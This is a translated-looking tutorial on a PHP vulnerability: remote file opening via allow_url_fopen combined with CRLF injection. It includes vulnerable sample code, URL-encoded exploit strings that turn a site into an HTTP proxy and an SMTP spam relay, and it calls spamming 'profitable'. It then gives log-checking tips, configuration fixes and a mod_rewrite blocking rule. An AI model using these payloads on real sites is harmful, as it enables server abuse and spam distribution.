File opening and external data. Potential vulnerability of the php-scripts

Functions fopen, file, include and require can open files from other sites by http and ftp protocols. That opportunity has potential vulnerability in the php-scripts and allows using site as a proxy.

In 2002 some groups which have been searching vulnerability in the software found serious vulnerability in PHP.

Vulnerability

Url fopen wrapper

For increasing the functionality and encoding simplification, php developers created such peculiarity in fopen, file, include functions. If file name starts with "http://", server will fulfill the HTTP-query, load the page, and will write to the variable as from the common file. Prefixes "ftp://", "php://" work analogously. It is made for escaping problems with http-query libraries and writing them manually. Given option can be switched off in the php settings, parameter allow_url_fopen.

CR/LF in HTTP-queries

Combination of the symbols carriage return and line feed in the HTTP-query separates headers. That combination can be transmitted in the GET-query like "%0D%0A".

Untrusted input

Pages on the many sites are generated by model script. Name of the file that should be opened is taken from REQUEST_URI. After the file reading model with navigation and header is added to that file and client can see the result.

Unskilled programmer can easily write file opening without data checking:


    <?php
    echo implode("", file(substr($REQUEST_URI, 1)));</php>


First symbol in query – slash – is thrown off and file starts opening. Malefactor can easily write the following line as a way to the file on server: http://example.com: http://n00b.programmer.com/http://example.com. Another variant, all addresses in the site look like: http://n00b.programmer.com/index.php?f=news. In that case malefactor will try to open the address like http://n00b.programmer.com/index.php?f=http://example.com. It is very important not to trust the input data and to filter input queries

Exploit

The address in the listed below example can’t be checked, that’s why we can enter the line with HTTP query. If malefactor opens the way:

index.php?f=http%3A%2F%2
Fexample.com%2F+HTTP%2F1.0%0D%0A%0D%0A
Host:+example.com%0D%0AUser-agent:+Space+Bizon%2F9%2E11%2E2001+
%28Windows+67%29%0D%0Avar1%3Dfoo%26var2%3Dbar%0D%0A%0D%0A


script will run the HTTP query:

GET example.com/ HTTP/1.0\r\n
Host: example.com\r\n
User-agent: Space Bizon/9.11.2001 (Windows 67)\r\n
var1=foo&var2=bar\r\n
\r\n
HTTP/1.0\r\n
Host: www.site1.st\r\n
User-Agent: PHP/4.1.2\r\n
\r\n


Last three lines are added by script automatically, but \r\n before them means query end. Thus unprotected script can be used as a proxy server.

Exploit using

If provider that gives a free demo access has a broken site we can write a script for the home server which can form queries to such proxy server. It can be considered as cognizable case but actually it is just mischievousness. More profitable using of the other machine is commercial spam distribution. For example:

index.php?f=http%3A%2F%2
Fmail.example.com%3A25%2F+HTTP/1.0%0D%0AHELO+ 
my.own.machine%0D%0AMAIL+FROM%3A%3Cme%40my.own.machine%3E%0D%0ARCPT+ 
TO%3A%3Cinfo%40site1.st%3E%0D%0ADATA%0D%0Ai+will+never+say+the+word+ 
PROCRASTINATE+again%0D%0A.%0D%0AQUIT%0D%0A%0D%0A


PHP module connects with mail.example.com server and sends the following script:

GET / HTTP/1.0\r\n
HELO my.own.machine\r\n
MAIL FROM:\r\n
RCPT TO:\r\n
DATA\r\n
i will never say the word PROCRASTINATE again\r\n
.\r\n
QUIT\r\n\r\n

HTTP/1.0\r\n
Host: mail.site1.st:25\r\n
User-Agent: PHP/4.1.2\r\n\r\n


PHP and mail server will have some problems but still e-mail message will be sent. Having such vulnerability in the site we can search closed mail relay that receives mail from the web server. That relay won’t be in the providers’ black-lists, that’s why spam distribution can be very effective.

Query journal checking

At first you have to become acquainted with the list of unique addresses requested from the site. It can help to learn if there were attacks. As usual, spammers try to find the opportunity of connecting with necessary mail relay on 25th port. That’s why you have to find the following lines: ":25" and "%3A25".

PHP setting

The simplest way of protecting is to prohibit URL opening by means of file functions. If you are server administrator prohibit allow_url_fopen in the php settings. If you are client, prohibit it locally. In the .htaccess file for the site root write the following line: php_value allow_url_fopen 0. If you are the hosting provider, you can prohibit URL fopen wrapper for all clients with the help of directive php_admin_value.

Code changing

There can be such situation, that you are client and hosting-provider admin has written all php settings to php_admin_value and they can’t be changed. In such situation you have to modify the script code. The simplest way is to find fopen, file and include functions and cut http:// and ftp:// prefixes with the help of str_replace function.

Finishing working in offensive query

Client scanning your site for searching variables creates an extra traffic and loads the server processor. He doesn’t need pages that generate your site if they don’t work as proxy. It is better to prevent such queries before launching the php – interpreter. You can do that with the help of the module mod_rewrite. In the .htaccess file in the site root enter the following line:

RewriteRule ((%3A|:)25|%0D%0A) - [G]

It is supposed that forms on your site aren’t sent by the method GET, because in that case they will be stopped by that rule. If you support addressing with the help of mod_rewrite probably colon and CRLF are not used. That’s why other lines of RewriteRule won’t be right for the scanning query and the line that finishes query processing should be set at the end of the rules list.